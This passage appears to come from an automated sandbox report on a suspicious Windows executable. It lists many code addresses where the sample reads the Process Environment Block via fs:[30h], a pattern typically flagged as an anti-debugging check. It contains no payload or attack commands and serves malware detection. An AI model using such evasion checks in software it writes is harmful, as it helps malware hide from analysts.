          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01253884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01253884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0126B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0126B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01203B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01203B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01204BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01204BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01204BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0128D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01202397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01214A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01214A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0128B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0128B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0121927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01264257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01202AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01202ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0125A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01204D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01204D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01204D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01213D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01253540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01283D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01201DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01201DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01201DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01202581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01202581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01202581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01202581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01288DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0126C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0126C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01256CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0126FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0126FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011EEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011EFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01257794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01257794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01257794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0128FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01208E00 mov eax, dword ptr fs:[00000030h]
